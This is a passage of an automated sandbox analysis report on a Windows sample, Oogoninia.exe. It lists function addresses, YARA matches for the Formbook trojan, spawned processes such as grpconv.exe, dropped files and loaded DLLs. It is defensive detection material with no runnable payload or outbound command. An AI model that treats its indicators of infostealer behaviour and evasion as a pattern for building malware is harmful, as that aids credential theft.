        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325213802_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DE0762_2_325DE076
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253B0D02_2_3253B0D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325200A02_2_325200A0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3257717A2_2_3257717A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F1132_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F010E2_2_325F010E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD1302_2_325CD130
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325351C02_2_325351C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E02_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DD6462_2_325DD646
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325546702_2_32554670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254C6002_2_3254C600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EF6F62_2_325EF6F6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252C6E02_2_3252C6E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A36EC2_2_325A36EC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E67572_2_325E6757
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253A7602_2_3253A760
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325304452_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FA5262_2_325FA526
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EF5C92_2_325EF5C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E75C62_2_325E75C6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EEA5B2_2_325EEA5B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ECA132_2_325ECA13
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EFA892_2_325EFA89
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254FAA02_2_3254FAA0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530B102_2_32530B10
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3256DB192_2_3256DB19
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A4BC02_2_325A4BC0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325398702_2_32539870
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B8702_2_3254B870
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325168682_2_32516868
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E8102_2_3255E810
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325338002_2_32533800
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325D08352_2_325D0835
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E18DA2_2_325E18DA
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325328C02_2_325328C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E78F32_2_325E78F3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325468822_2_32546882
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325358B02_2_325358B0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A98B22_2_325A98B2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325759C02_2_325759C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_324F99E82_2_324F99E8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252E9A02_2_3252E9A0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EE9A62_2_325EE9A6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550E502_2_32550E50
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32572E482_2_32572E48
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325D0E6D2_2_325D0E6D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E9ED22_2_325E9ED2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32522EE82_2_32522EE8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32531EB22_2_32531EB2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E0EAD2_2_325E0EAD
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EFF632_2_325EFF63
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253CF002_2_3253CF00
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E1FC62_2_325E1FC6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EEFBF2_2_325EEFBF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DEC4C2_2_325DEC4C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533C602_2_32533C60
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E6C692_2_325E6C69
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EEC602_2_325EEC60
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520C122_2_32520C12
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253AC202_2_3253AC20
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32548CDF2_2_32548CDF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32538CE02_2_32538CE0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FACEB2_2_325FACEB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254FCE02_2_3254FCE0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325C9C982_2_325C9C98
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E7D4C2_2_325E7D4C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530D692_2_32530D69
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_041260024_2_04126002
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_04125C694_2_04125C69
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0412506D4_2_0412506D
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_041243084_2_04124308
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_04125B494_2_04125B49
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CDD4809_2_04CDD480
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C704459_2_04C70445
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D275C69_2_04D275C6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F5C99_2_04D2F5C9
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3A5269_2_04D3A526
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE36EC9_2_04CE36EC
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F6F69_2_04D2F6F6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6C6E09_2_04C6C6E0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1D6469_2_04D1D646
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C946709_2_04C94670
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8C6009_2_04C8C600
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0D62C9_2_04D0D62C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D267579_2_04D26757
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7A7609_2_04C7A760
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6170C9_2_04C6170C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7B0D09_2_04C7B0D0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C600A09_2_04C600A0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1E0769_2_04D1E076
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C751C09_2_04C751C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8B1E09_2_04C8B1E0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB717A9_2_04CB717A
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C5F1139_2_04C5F113
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3010E9_2_04D3010E
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0D1309_2_04D0D130
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C5D2EC9_2_04C5D2EC
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C322459_2_04C32245
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2124C9_2_04D2124C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8D2109_2_04C8D210
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C613809_2_04C61380
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7E3109_2_04C7E310
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F3309_2_04D2F330
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C88CDF9_2_04C88CDF
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C78CE09_2_04C78CE0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8FCE09_2_04C8FCE0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3ACEB9_2_04D3ACEB
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D09C989_2_04D09C98
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1EC4C9_2_04D1EC4C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C73C609_2_04C73C60
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EC609_2_04D2EC60
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D26C699_2_04D26C69
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C60C129_2_04C60C12
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7AC209_2_04C7AC20
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C79DD09_2_04C79DD0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0FDF49_2_04D0FDF4
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C82DB09_2_04C82DB0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D27D4C9_2_04D27D4C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C70D699_2_04C70D69
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6AD009_2_04C6AD00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D31D2E9_2_04D31D2E
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D29ED29_2_04D29ED2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C62EE89_2_04C62EE8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C71EB29_2_04C71EB2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D20EAD9_2_04D20EAD
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB2E489_2_04CB2E48
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C90E509_2_04C90E50
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D10E6D9_2_04D10E6D
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D21FC69_2_04D21FC6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EFBF9_2_04D2EFBF
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2FF639_2_04D2FF63
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7CF009_2_04C7CF00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C728C09_2_04C728C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D218DA9_2_04D218DA
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D278F39_2_04D278F3
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C868829_2_04C86882
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C758B09_2_04C758B0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE98B29_2_04CE98B2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C568689_2_04C56868
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C798709_2_04C79870
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8B8709_2_04C8B870
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C738009_2_04C73800
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C9E8109_2_04C9E810
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D108359_2_04D10835
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB59C09_2_04CB59C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C399E89_2_04C399E8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6E9A09_2_04C6E9A0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2E9A69_2_04D2E9A6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2FA899_2_04D2FA89
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8FAA09_2_04C8FAA0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EA5B9_2_04D2EA5B
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2CA139_2_04D2CA13
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE4BC09_2_04CE4BC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CADB199_2_04CADB19
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C70B109_2_04C70B10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2EFFE9_2_04B2EFFE
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E4449_2_04B2E444
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E7DD9_2_04B2E7DD
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2D8489_2_04B2D848
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2CAE39_2_04B2CAE3
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E3249_2_04B2E324
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04CB7BE4 appears 88 times
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04CA5050 appears 36 times
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04C5B910 appears 251 times
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04CEEF10 appears 105 times
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04CDE692 appears 84 times
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: String function: 32577BE4 appears 84 times
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: String function: 3251B910 appears 229 times
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: String function: 3259E692 appears 80 times
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: String function: 325AEF10 appears 89 times
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: String function: 32565050 appears 34 times
        Source: Oogoninia.exeStatic PE information: invalid certificate
        Source: Oogoninia.exe, 00000002.00000002.1365528846.00000000327C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000003.1266200701.00000000322A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1354974337.000000000225B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGRPCONV.EXEj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000003.1269709171.000000003246C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGRPCONV.EXEj% vs Oogoninia.exe
        Source: Oogoninia.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal96.troj.evad.winEXE@5/7@2/2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004043C3 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043C3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Program Files (x86)\Fljtenists.iniJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Users\user\slavelivetsJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Users\user\AppData\Local\Temp\nsqBBFA.tmpJump to behavior
        Source: Oogoninia.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Oogoninia.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Oogoninia.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\Desktop\Oogoninia.exeFile read: C:\Users\user\Desktop\Oogoninia.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeFile written: C:\Program Files (x86)\Fljtenists.iniJump to behavior
        Source: Oogoninia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: grpconv.pdb source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: grpconv.pdbGCTL source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
